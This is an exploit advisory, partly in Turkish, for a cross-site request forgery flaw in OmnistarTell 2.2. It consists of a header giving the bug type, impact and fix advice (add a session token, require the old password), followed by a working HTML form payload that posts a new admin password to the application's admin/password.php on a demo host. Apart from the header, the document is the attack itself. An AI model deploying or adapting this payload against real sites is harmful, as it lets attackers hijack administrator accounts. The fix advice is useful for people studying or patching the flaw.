< ------------------- header data start ------------------- >

#############################################################

# Application Name :OmnistarTell

# Version : 2.2

# vulnerable Type : xsrf

# Infection : Uzaktan otomatik olarak admin bilgileri degistirebilinir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : BUG RESEARCHERS//CWH1RLPOOL

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<form action=http://demo.hostcontroladmin.com/demo_tell3/admin/password.php method=post><table width=100% border=1 cellpadding=0 cellspacing=0 bordercolor=#CCCCCC style=’border-collapse:collapse;’>
<tr valign=top>
<td height=21 align=center valign=middle nowrap background=../images/title_bg.jpg class=Arial12Grey><div align=left><b></b></div></td>

</tr>
</table>
<table width=100% border=0 cellspacing=0 cellpadding=0>
<tr>
<td><img src=../images/spacer.gif width=1 height=1></td>
</tr>
</table>
<table width=722 border=1 cellpadding=5 cellspacing=0 bordercolor=#CCCCCC style=’border-collapse:collapse;’><tr bgcolor=#f4f4f4><td class=Arial11Grey> * New password: </td><td class=Arial11Blue><input type=password name=’f_password’ value= ></td></tr>

<tr bgcolor=#f4f4f4><td class=Arial11Grey>* Confirm password: </td><td class=Arial11Blue><input type=password name=’f_password2’ value= ></td></tr>
<tr bgcolor=f4f4f4><td colspan=2 class=Arial11Grey align=left><input type=submit name=check value=’update’></td></tr>
</table></form>

< -- bug code end of -- >